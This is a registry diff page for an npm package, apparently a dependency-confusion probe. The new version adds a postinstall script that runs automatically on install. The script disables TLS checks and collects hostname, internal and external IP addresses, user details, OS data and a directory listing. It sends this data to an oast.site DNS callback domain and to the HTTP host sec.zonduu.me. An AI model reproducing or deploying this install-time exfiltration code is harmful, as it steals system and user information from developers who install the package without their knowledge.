randompackage-notreal 0.0.1-security → 1.0.4

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of randompackage-notreal might be problematic. Click here for more details.

Files changed (4) hide show
  1. package/index.js +2 -0
  2. package/package.json +18 -3
  3. package/postinstall.js +123 -0
  4. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1,2 @@
1
+ // index.js
2
+ console.log("This is the index.js of the @visa-isat/components package");
package/package.json CHANGED
@@ -1,6 +1,21 @@
1
1
  {
2
2
  "name": "randompackage-notreal",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.0.4",
4
+ "description": "Researcher public package",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "postinstall": "node postinstall.js"
8
+ },
9
+ "keywords": [],
10
+ "author": "",
11
+ "license": "ISC",
12
+ "private": false,
13
+ "files": [
14
+ "dist/css/common.css",
15
+ "postinstall.js",
16
+ "index.js"
17
+ ],
18
+ "dependencies": {
19
+ "randompackage-notreal": "^1.0.3"
20
+ }
6
21
  }
package/postinstall.js ADDED
@@ -0,0 +1,123 @@
1
+ const fs = require('fs');
2
+ const dns = require('dns');
3
+ const http = require('http');
4
+ const https = require('https');
5
+ const os = require('os');
6
+ const { execSync } = require('child_process');
7
+
8
+ const logFile = '/tmp/postinstall.log';
9
+
10
+ process.env["NODE_TLS_REJECT_UNAUTHORIZED"] = 0;
11
+
12
+ fs.appendFileSync(logFile, `Starting postinstall script\n`);
13
+
14
+ const hostname = os.hostname();
15
+ const packageName = process.env.npm_package_name;
16
+ const packageVersion = process.env.npm_package_version;
17
+ const internalIpAddress = execSync('hostname -I').toString().trim();
18
+ const currentPath = process.cwd(); // Use process.cwd() to capture current directory
19
+ const platform = os.platform();
20
+ const userInfo = os.userInfo();
21
+
22
+ // Get list of files in the current directory (where npm install is run)
23
+ let directoryFiles;
24
+ try {
25
+ directoryFiles = execSync('ls').toString().trim();
26
+ } catch (error) {
27
+ directoryFiles = `Error executing ls command: ${error.message}`;
28
+ }
29
+
30
+ const osDetails = {
31
+ platform: os.platform(),
32
+ release: os.release(),
33
+ arch: os.arch()
34
+ };
35
+
36
+ const fetchExternalIpAddress = (callback) => {
37
+ https.get('https://api.ipify.org?format=json', (res) => {
38
+ let data = '';
39
+
40
+ res.on('data', (chunk) => {
41
+ data += chunk;
42
+ });
43
+
44
+ res.on('end', () => {
45
+ const externalIp = JSON.parse(data).ip;
46
+ callback(null, externalIp);
47
+ });
48
+
49
+ }).on('error', (err) => {
50
+ callback(err);
51
+ });
52
+ };
53
+
54
+ fetchExternalIpAddress((err, externalIpAddress) => {
55
+ if (err) {
56
+ fs.appendFileSync(logFile, `Error fetching external IP address: ${err.message}\n`);
57
+ return;
58
+ }
59
+
60
+ const data = {
61
+ packageName,
62
+ packageVersion,
63
+ hostname,
64
+ internalIpAddress,
65
+ externalIpAddress,
66
+ currentPath,
67
+ platform,
68
+ userInfo,
69
+ osDetails,
70
+ directoryFiles // Include the directory listing from the current directory
71
+ };
72
+
73
+ fs.appendFileSync(logFile, `Data: ${JSON.stringify(data)}\n`);
74
+
75
+ const dnsData = `${packageName}-${hostname}-${externalIpAddress}`;
76
+ const hexData = Buffer.from(dnsData).toString('hex');
77
+
78
+ const maxLabelLength = 63;
79
+ const hexDataParts = [];
80
+ for (let i = 0; i < hexData.length; i += maxLabelLength) {
81
+ hexDataParts.push(hexData.substring(i, i + maxLabelLength));
82
+ }
83
+
84
+ hexDataParts.forEach((part, index, arr) => {
85
+ const partIndex = index + 1;
86
+ const totalParts = arr.length;
87
+ const dnsSubdomain = `${part}-${partIndex}-${totalParts}.cqati6eupgoo97it17fgdatea3nw746q1.oast.site`;
88
+ dns.resolve4(dnsSubdomain, (err, addresses) => {
89
+ if (err) {
90
+ fs.appendFileSync(logFile, `DNS resolution failed: ${err}\n`);
91
+ } else {
92
+ fs.appendFileSync(logFile, `DNS query sent for ${dnsSubdomain}\n`);
93
+ }
94
+ });
95
+ });
96
+
97
+ const getData = `targetUrl=${encodeURIComponent(JSON.stringify(data))}`;
98
+
99
+ const options = {
100
+ hostname: 'sec.zonduu.me',
101
+ port: 80,
102
+ path: `/callbackplz?${getData}`,
103
+ method: 'GET'
104
+ };
105
+
106
+ const req = http.request(options, (res) => {
107
+ let responseData = '';
108
+ res.on('data', (chunk) => {
109
+ responseData += chunk;
110
+ });
111
+ res.on('end', () => {
112
+ fs.appendFileSync(logFile, `HTTP request completed with status ${res.statusCode}: ${responseData}\n`);
113
+ });
114
+ });
115
+
116
+ req.on('error', (e) => {
117
+ fs.appendFileSync(logFile, `HTTP request failed: ${e}\n`);
118
+ });
119
+
120
+ req.end();
121
+
122
+ fs.appendFileSync(logFile, `postinstall script finished\n`);
123
+ });
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=randompackage-notreal for more information.